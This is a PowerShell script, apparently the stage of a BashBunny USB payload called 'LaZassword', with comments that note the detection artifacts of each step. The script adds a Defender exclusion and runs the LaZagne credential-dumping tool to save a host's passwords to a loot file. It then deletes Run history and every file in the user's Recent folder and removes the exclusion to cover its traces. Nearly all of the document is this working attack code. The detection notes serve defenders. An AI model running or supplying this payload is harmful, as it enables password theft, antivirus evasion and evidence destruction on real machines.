LaZassword.ps1
#############################################
# CONFIGURATION #
#############################################
# Overview: PowerShell stage of a BashBunny payload. It finds the volume
# labelled BASHBUNNY, excludes that volume from Microsoft Defender scanning,
# expands LaZagne.zip from it, writes the tool's output to a loot file on the
# same volume, and then removes several traces on the host (Run history, the
# extracted folder, the Defender exclusion, the user's Recent items).
# The DETECTION notes below mark the artifacts each step produces.
# Define ExeArguments here (all -vv is default):
$ExeArgs = "all -vv"
# Define loot folder name here (hostname_LaZagne is default):
$foldername = "$env:computername" + "_LaZagne"
# Define loot file name here (hostname is default):
$filename = "$env:computername"
#######################################################
# PAYLOAD #
#######################################################
# Define variable for the driveletter of the BashBunny
# (WMI query on win32_volume, filtered on the volume label "BASHBUNNY")
$BashBunnyLabel = (gwmi -class win32_volume -f {label = "BASHBUNNY"}).DriveLetter
# Add antivirus exclusion for the whole BashBunny
# DETECTION: Defender records configuration changes as event 5007 in the
# "Microsoft-Windows-Windows Defender/Operational" log; an exclusion for the
# root of a removable volume is a strong signal. Add-MpPreference needs an
# elevated session, so this step fails for a standard user.
Add-MpPreference -ExclusionPath "$BashBunnyLabel"
# Unzip lazagne.zip
# (-Force overwrites an existing LaZagne folder on the device)
Expand-Archive -Force $BashBunnyLabel\LaZagne.zip $BashBunnyLabel\LaZagne
# Define variable for the path to LaZagne + execution arguments
$LaZagnePath = $BashBunnyLabel\LaZagne\LaZagne.exe $ExeArgs
# Create the loot folder in the "\loot\LaZassword\" directory
New-Item -ItemType Directory -Force -Path $BashBunnyLabel\loot\LaZassword\$foldername
# Define variable for the loot file
# NOTE: the loot path is on the removable volume, so this script leaves no
# copy of the output on the host's own disks.
$lootfile = "$BashBunnyLabel\loot\lazassword\$foldername\$filename.txt"
# Execute LaZagne and save the output in the loot file
# DETECTION: with PowerShell script block logging enabled, the
# Invoke-Expression content is recorded (event 4104); process-creation
# auditing shows an executable launched from a removable drive letter.
Invoke-Expression $LaZagnePath | Out-File -FilePath $lootfile
# Delete the run (win+r) history
# DETECTION: anti-forensic step. /va /f silently deletes every value under
# RunMRU; the reg.exe command line is visible to process-creation logging
# that captures command lines.
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Remove the unzipped LaZagne folder
Remove-Item "$BashBunnyLabel\LaZagne\" -recurse
# Remove the antivirus exclusion for the BashBunny
# DETECTION: an exclusion that is added and then removed within one short
# session shows up as a pair of Defender configuration-change events.
Remove-MpPreference -ExclusionPath "$BashBunnyLabel"
# Delete the "recent files" reference
# NOTE: this deletes every file under the user's Recent folder, not only the
# entries created by this run; a suddenly empty Recent list is itself an
# indicator during triage.
Get-ChildItem -Path C:\Users\\$env:UserName\AppData\Roaming\Microsoft\Windows\Recent -Include * -File -Recurse | foreach { $_.Delete()}
# Send the finished message to the BashBunny
# NOTE(review): 172.16.64.1 is presumably the device's own network-side
# address (confirm against the payload's other files). An SMB reference to
# that address from a workstation is a network-level indicator.
\\172.16.64.1\LaZassword